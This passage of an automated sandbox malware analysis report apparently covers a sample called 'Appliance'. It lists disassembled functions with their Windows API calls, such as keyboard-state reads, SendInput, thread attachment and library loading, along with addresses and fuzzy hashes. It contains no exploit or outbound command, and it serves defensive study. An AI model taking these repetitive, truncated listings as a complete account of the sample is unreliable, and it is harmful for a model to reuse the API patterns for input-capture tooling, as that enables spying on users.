GetLastError.KERNEL32(?,00000000), ref: 00E361EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E36213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E3623F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: cb37e49385cf1cd8819bd36090a788a5e25efd3c28ee77b2d80b8947a3c83706
Instruction ID: 4cbd2c1095a16398682a11ea4af5812126b8ec26b60b5724b44f0090ea806bf2
Opcode Fuzzy Hash: cb37e49385cf1cd8819bd36090a788a5e25efd3c28ee77b2d80b8947a3c83706
Instruction Fuzzy Hash: B8413A39600611DFCB21DF25C545A1ABBF6EF89714F198488E94AAB362CB31FC01DBA1

Function 00E2B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00E2B473
SetKeyboardState.USER32(00000080), ref: 00E2B48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00E2B4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00E2B54F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: fe5dd5b0c3cf4f84f0e5434badf73ddc21654f4959221124761087c3a4e1e203
Instruction ID: f3083922400aef3d5d5b116794693a059c04425439f9b1490d27911da2c099e9
Opcode Fuzzy Hash: fe5dd5b0c3cf4f84f0e5434badf73ddc21654f4959221124761087c3a4e1e203
Instruction Fuzzy Hash: 42318B70A40328AFFF34DB25AC447FA7BB6BB48315F08561AE0A2BA1D2D37489858751

Function 00E2B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00E2B5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00E2B5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 00E2B63B
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00E2B68D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 0dce1903a33d5c80b446307c6be15673b172a72b47275ab9a4cb0a8443c1aee0
Instruction ID: 05afab261060cc16ffc3e4996879dce0e09948ec6d02a250a03bb8258c6f21ea
Opcode Fuzzy Hash: 0dce1903a33d5c80b446307c6be15673b172a72b47275ab9a4cb0a8443c1aee0
Instruction Fuzzy Hash: 8E313E309406289FFF348B65AC057FA7BB6BF85314F08922AE481B61D1C77489458B51

Function 00E580AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00E580D4
GetWindowRect.USER32(?,?), ref: 00E5814A
PtInRect.USER32(?,?,?), ref: 00E5815A
MessageBeep.USER32(00000000), ref: 00E581C6

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 61ed4533435ba313fdd90519444c4de94c8a2746a74fdde588cef8a214913492
Instruction ID: f29ebc1674c77cd456569c8f301325acf942dad8426f0d3f82bcef998ff5a146
Opcode Fuzzy Hash: 61ed4533435ba313fdd90519444c4de94c8a2746a74fdde588cef8a214913492
Instruction Fuzzy Hash: 8641AF30A02614EFCB15CF59CA80AA977F5FB45316F1458A9EE44BB261CB30A84ECF40

Function 00E52176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00E52187

Part of subcall function 00E24393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E243AD
Part of subcall function 00E24393: GetCurrentThreadId.KERNEL32 ref: 00E243B4
Part of subcall function 00E24393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E22F00), ref: 00E243BB

GetCaretPos.USER32(?), ref: 00E5219B
ClientToScreen.USER32(00000000,?), ref: 00E521E8
GetForegroundWindow.USER32 ref: 00E521EE

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 0c1100e210185b21a1da5ef2c021b7cef669de596a896a129fc4f7d5ccb9ae63
Instruction ID: 04feebedf765e439d8053516f5c4bdd110e008aef60ac41b4db047718a14fbf3
Opcode Fuzzy Hash: 0c1100e210185b21a1da5ef2c021b7cef669de596a896a129fc4f7d5ccb9ae63
Instruction Fuzzy Hash: 1C3170B1D01209AFC704DFAAC981DAEBBFCEF48304B50846EE515E7251DB71AE45CBA0

Function 00E2E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00DC41EA: _wcslen.LIBCMT ref: 00DC41EF

_wcslen.LIBCMT ref: 00E2E8E2
_wcslen.LIBCMT ref: 00E2E8F9
_wcslen.LIBCMT ref: 00E2E924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00E2E92F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 10bee797bf23bbd7f5781f8e3e54c3f2ef015a825bae5dd59eb42c09662397a4
Instruction ID: 5465bf74584ba16a1a393231df746a359f11d06190421040be1fa5c8fb3b37d8
Opcode Fuzzy Hash: 10bee797bf23bbd7f5781f8e3e54c3f2ef015a825bae5dd59eb42c09662397a4
Instruction Fuzzy Hash: AC21B571900324EFCB10AFA5D982BAEB7F8EF55750F144065E844BB341D6709E41C7B1

Function 00E2DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00E5DC30), ref: 00E2DBA6
GetLastError.KERNEL32 ref: 00E2DBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00E2DBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E5DC30), ref: 00E2DC21

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 875235fc699f646293b5b14a0e44ee0fb0d3f499f66b082936c0f2c1597b1637
Instruction ID: 9c81686d64331fd72b15c75d6b346a0c1753eb43cfa0795218bbb286bfaf89f7
Opcode Fuzzy Hash: 875235fc699f646293b5b14a0e44ee0fb0d3f499f66b082936c0f2c1597b1637
Instruction Fuzzy Hash: D721D33050C3158F8714DF28EC8199BB7E8EF55369F101A1DF499E32A1DB30D98ACB92

Function 00E5321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00E532A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E532C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E532CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E532DC

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: eb162cb81edd30b0ef565ee93c23344316cc69d7eac6dbaf841cb8257b060004
Instruction ID: c7bc1cb42674f761efbc9b2c8ce163108756bb55126d2e1c5f588573ab68fedb
Opcode Fuzzy Hash: eb162cb81edd30b0ef565ee93c23344316cc69d7eac6dbaf841cb8257b060004
Instruction Fuzzy Hash: 52213835208511AFD7159B24CC44F6ABB95FF41356F248A4CF8269B2E2C771ED45CBD0

Function 00E2825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E296E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00E28271,?,000000FF,?,00E290BB,00000000,?,0000001C,?,?), ref: 00E296F3
Part of subcall function 00E296E4: lstrcpyW.KERNEL32(00000000,?,?,00E28271,?,000000FF,?,00E290BB,00000000,?,0000001C,?,?,00000000), ref: 00E29719
Part of subcall function 00E296E4: lstrcmpiW.KERNEL32(00000000,?,00E28271,?,000000FF,?,00E290BB,00000000,?,0000001C,?,?), ref: 00E2974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00E290BB,00000000,?,0000001C,?,?,00000000), ref: 00E2828A
lstrcpyW.KERNEL32(00000000,?,?,00E290BB,00000000,?,0000001C,?,?,00000000), ref: 00E282B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,00E290BB,00000000,?,0000001C,?,?,00000000), ref: 00E282EB

Strings

cdecl, xrefs: 00E282E2

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: c851b6f4a1538474c939b5d3ea89eea95dab486c9c3ccdd7febd1c13f45f82c0
Instruction ID: 09f86d1589f9152ae43c11b2c0764c126e6fbe04b335dbcb9644691cbf450378
Opcode Fuzzy Hash: c851b6f4a1538474c939b5d3ea89eea95dab486c9c3ccdd7febd1c13f45f82c0
Instruction Fuzzy Hash: 5311263A201351AFCB14AF39EC44E7A77E9FF49754B10602AF946DB260EF719841C7A0

Function 00E560FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00E5615A
_wcslen.LIBCMT ref: 00E5616C
_wcslen.LIBCMT ref: 00E56177
SendMessageW.USER32(?,00001002,00000000,?), ref: 00E562B5

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: f407727d32b985b586c8b64e72aaf94ea9b95345cae318b1da3abd01a7413404
Instruction ID: 20e8b76b2fc3c88f276fac3d78a16159107c5391a72ea517f5e88290f2735b32
Opcode Fuzzy Hash: f407727d32b985b586c8b64e72aaf94ea9b95345cae318b1da3abd01a7413404
Instruction Fuzzy Hash: FC11B435600608AADF20DF668D84AEE77BCEB15355F50592AFE15F6082E770C949CB70

Function 00DF2079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67c4b44d9e1a69c764d3f192bfbba143fb87379978dea50b15eb3186b6cdb428
Instruction ID: a1938cba0c2cabd0f957c88c855de674b4ff44dac2f1a3760287431922f365e4
Opcode Fuzzy Hash: 67c4b44d9e1a69c764d3f192bfbba143fb87379978dea50b15eb3186b6cdb428
Instruction Fuzzy Hash: C801A2B320A61E7EF62126786CC0FB7670DDF413B8B3A8725B721A11D1DE618D8491B0

Function 00E22374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00E22394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E223A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E223BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E223D7

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 037ca3d35fab313179b7769e5478b2a37146189a54ed669945780ecdf746019c
Instruction ID: 424b0438bde8749a0b7c665919562001fc32c5f8f2cf703cc87e372340c352f0
Opcode Fuzzy Hash: 037ca3d35fab313179b7769e5478b2a37146189a54ed669945780ecdf746019c
Instruction Fuzzy Hash: D711093A900229FFEB11DBA5DD85F9DBBB8FF08754F201095EA01B7290D6716E10DB94

Function 00E2EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00E2EB14
MessageBoxW.USER32(?,?,?,?), ref: 00E2EB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E2EB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E2EB64

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: e9d232c09e3a6d1bf7c4d487de6d79daa0d8f868107ec5b2ebdf2c4efdf44501
Instruction ID: f7de8b136c15c9beaefa01f057ecfd22e5090d8851f50d5e675d7485fe0da735
Opcode Fuzzy Hash: e9d232c09e3a6d1bf7c4d487de6d79daa0d8f868107ec5b2ebdf2c4efdf44501
Instruction Fuzzy Hash: 01112B76904329BFCB11EBA9AC05A9E7FADEB46315F10425BF915F3390D67489088760

Function 00DED53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00DED369,00000000,00000004,00000000), ref: 00DED588
GetLastError.KERNEL32 ref: 00DED594
__dosmaperr.LIBCMT ref: 00DED59B
ResumeThread.KERNEL32(00000000), ref: 00DED5B9

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 375cc718dcfad6ca6700f0056b0bb5aa33cd535c13702d1a0a87d2dad55f38c4
Instruction ID: 31a5c2e1645debe0131e3bffa4d852e59e567a142414d60306d29b51a0122e18
Opcode Fuzzy Hash: 375cc718dcfad6ca6700f0056b0bb5aa33cd535c13702d1a0a87d2dad55f38c4
Instruction Fuzzy Hash: 1E01F532405694BFCB207FA7DC09BAE7B6AEF82735F140219F925961E0DF708844C6B1

Function 00DC7873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DC78B1
GetStockObject.GDI32(00000011), ref: 00DC78C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC78CF

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: d2f7fa5ff4b4776f4da6c52a28d2b1ba5cd6e4fccb50bc784e9c64c10a8df5c1
Instruction ID: 7a1ab12ab57fb8cd067cfc1748d7887e12d5ee72a90e977370dd369243f37fca
Opcode Fuzzy Hash: d2f7fa5ff4b4776f4da6c52a28d2b1ba5cd6e4fccb50bc784e9c64c10a8df5c1
Instruction Fuzzy Hash: 30118B7250560ABFDF1A5F908C58FEA7B69FF083A5F04011AFA0162160D731DC60EBA0

Function 00DF33E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00DF338D,00000364,00000000,00000000,00000000,?,00DF35FE,00000006,FlsSetValue), ref: 00DF3418
GetLastError.KERNEL32(?,00DF338D,00000364,00000000,00000000,00000000,?,00DF35FE,00000006,FlsSetValue,00E63260,FlsSetValue,00000000,00000364,?,00DF31B9), ref: 00DF3424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00DF338D,00000364,00000000,00000000,00000000,?,00DF35FE,00000006,FlsSetValue,00E63260,FlsSetValue,00000000), ref: 00DF3432

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 16fab3f2bf8b9765f0f48623a17056e25fbe986b9c15733ee49ad127027dd735
Instruction ID: 5b2d48e443edf971d611f1f32ac602db45513e216d1f7dcfba63878fa0cb3999
Opcode Fuzzy Hash: 16fab3f2bf8b9765f0f48623a17056e25fbe986b9c15733ee49ad127027dd735
Instruction Fuzzy Hash: 1A01D83261532A9FCB328B7ADC449667B58BF04BA17174624FB06E3240C720DA45C6F0

Function 00E2BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E2B69A,?,00008000), ref: 00E2BA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E2B69A,?,00008000), ref: 00E2BAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E2B69A,?,00008000), ref: 00E2BABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E2B69A,?,00008000), ref: 00E2BAED

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 4f64fad37e020bf62c64137c97a319b120a64d182294ac77ca0028c4030b5a18
Instruction ID: 45196dfe96b88dcdfa0c58b978f87858ee3527edcff36816b0daebb6b9a89aa0
Opcode Fuzzy Hash: 4f64fad37e020bf62c64137c97a319b120a64d182294ac77ca0028c4030b5a18
Instruction Fuzzy Hash: 81118BB0C05A2DEBCF04DFA5E9486EEBB78FF09711F104095D981B2240CB308A54CBA1

Function 00E5886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00E5888E
ScreenToClient.USER32(?,?), ref: 00E588A6
ScreenToClient.USER32(?,?), ref: 00E588CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E588E5

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

